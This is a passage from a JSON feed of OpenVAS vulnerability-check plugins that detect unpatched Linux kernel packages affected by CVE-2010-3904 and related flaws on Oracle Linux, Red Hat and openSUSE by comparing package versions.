rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:24", "description": "Oracle Linux Local Security Checks ELSA-2010-0792", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-0792", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122303", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0792.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122303\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:20 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0792\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0792 - kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0792\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0792.html\");\n script_cve_id(\"CVE-2010-3904\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.4.0.1.el5~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.4.0.1.el5PAE~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.4.0.1.el5debug~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.4.0.1.el5xen~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.4.0.1.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.4.0.1.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.4.0.1.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.4.0.1.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-19T15:05:02", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-11-16T00:00:00", "type": "openvas", "title": "SuSE Update for kernel SUSE-SA:2010:053", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-2963"], "modified": "2018-01-19T00:00:00", "id": "OPENVAS:1361412562310850147", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850147", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for kernel SUSE-SA:2010:053\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openSUSE 11.2 and 11.3 kernels were updated to fix 2 critical\n security issues and some small bugs.\n\n Following security issues were fixed:\n CVE-2010-3904: A local privilege escalation in RDS sockets allowed\n local attackers to gain root privileges.\n\n We thank Dan Rosenberg for reporting this problem.\n\n\n CVE-2010-2963: A problem in the compat ioctl handling in video4linux\n allowed local attackers with a video device plugged in to gain root\n privileges on x86_64 systems.\n\n We thank Kees Cook for reporting this problem.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"local privilege escalation\";\ntag_affected = \"kernel on openSUSE 11.2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850147\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-053\");\n script_cve_id(\"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"SuSE Update for kernel SUSE-SA:2010:053\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.1_2.6.31.14_0.4~6.9.32\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.1_2.6.31.14_0.4~6.9.32\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:33:02", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-11-16T00:00:00", "type": "openvas", "title": "SuSE Update for kernel SUSE-SA:2010:053", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-2963"], "modified": "2017-12-21T00:00:00", "id": "OPENVAS:850147", "href": "http://plugins.openvas.org/nasl.php?oid=850147", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for kernel SUSE-SA:2010:053\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openSUSE 11.2 and 11.3 kernels were updated to fix 2 critical\n security issues and some small bugs.\n\n Following security issues were fixed:\n CVE-2010-3904: A local privilege escalation in RDS sockets allowed\n local attackers to gain root privileges.\n\n We thank Dan Rosenberg for reporting this problem.\n\n\n CVE-2010-2963: A problem in the compat ioctl handling in video4linux\n allowed local attackers with a video device plugged in to gain root\n privileges on x86_64 systems.\n\n We thank Kees Cook for reporting this problem.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"local privilege escalation\";\ntag_affected = \"kernel on openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850147);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-053\");\n script_cve_id(\"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"SuSE Update for kernel SUSE-SA:2010:053\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.31.14~0.4.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.1_2.6.31.14_0.4~6.9.32\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.1_2.6.31.14_0.4~6.9.32\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:07", "description": "Oracle Linux Local Security Checks ELSA-2010-2009", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-2009", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-3477", "CVE-2010-3067"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122306", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122306", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-2009.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122306\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:23 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-2009\");\n script_tag(name:\"insight\", value:\"ELSA-2010-2009 - Oracle Linux 5 Unbreakable Enterprise kernel security fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-2009\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-2009.html\");\n script_cve_id(\"CVE-2010-3067\", \"CVE-2010-3477\", \"CVE-2010-3904\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n 